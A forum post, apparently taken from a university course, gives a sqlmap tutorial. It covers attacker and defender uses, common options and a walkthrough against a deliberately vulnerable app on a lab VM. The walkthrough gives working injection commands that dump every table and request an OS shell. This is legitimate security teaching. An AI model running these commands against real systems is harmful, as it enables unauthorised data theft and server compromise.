Jump to content
Burhan

SQLMAP

Recommended Posts

Attackers can use the tool to get into a database, and potentially the server!
Sqlmap is capable of providing a sql shell into the database - allowing an attacker to potentially execute any arbitrary sql command.
Moreover, sqlmap also has an option to provide the attacker with an OS shell, with which the attacker can execute any arbitrary OS commands! (Sql Injection leading to Command Injection!)
Sqlmap will also try to crack user passwords when it finds hashes, using dictionary attacks - so attackers can even use this tool to get your passwords!

For defender

Defenders can use sqlmap for penetration testing of their web applications, servers, and databases.
Use the tool to crack week passwords, assess whether the database is run with restrictive privileges, and to detect any potential injection holes in the application

Options

Sqlmap is a command line tool, and just like any other unix utility, one can find all the options they need to know by simply invoking the -h flag. i.e sqlmap -h, which will display all the options the tool accepts.

Essentially, to use sqlmap, all you need to know is the url of the target web application along with the parameters to target for injection.
Here are the most common options to remember for using sqlmap:

  • To fingerprint a database:
    sqlmap -u “URL?name=value" --data=“name=&name=value” --cookie=“name=value“ -f
  • To identify Databse users, password, roles & privileges:
    sqlmap –u “” --users --password --privileges --roles
  • To get database tables & columns
    sqlmap –u “” --tables --columns --dump

There are numerous other options, all of which can be found here:
https://github.com/sqlmapproject/sqlmap/wiki/Usage

 

Tutorial / Demo

Installation Instructions

All the demonstration are within a custom VM accesible by all students on dh2020pc00 machine.

  1. Grab a copy of CustomUbuntu804Server.zip from /virtual/injection/ directory on the dh2020pc00 machine.
    Ex: scp $USER@dh2020pc00.utm.utoronto.ca:/virtual/injection/CustomUbuntu804Server.zip /virtual/$USER
    cd /virtual/$USER
    unzip CustomUbuntu804Server.zip
  2. Run Vmplayer, open a VM you just unzipped, USE Nat or VMNET8 for Network Adapter setting
  3. Login with username root and password password
  4. Note down the ipaddress shown (/sbin/ifconfig should show you the ip address if you missed it).
    We will refer to $ipaddress as the ipaddress that showed up for you, for the subsequent steps.

Tutorial

Sqlmap has been installed on the custom VM that you just setup.
from terminal sqlmap -h will show the options of sqlmap.

The following tutorial uses the very vulnerably fourFours application accessible on the browser at $ipaddress/fourFours

  1. Fingerprint the database and server hosting fourFours using sqlmap:
    sqlmap -u 127.0.0.1/fourFours/index.php --data="user=&password=&operation=login"
  2. Get all tables of public database:
    sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --tables -D public
  3. Get all columns and data of fourfouruser table from public database:
    sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --columns -D public -T fourfoursuser
  4. Dump all database tables entries:
    sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --dump-all
  5. Prompt to get an OS Shell!
    sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --os-shell
  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...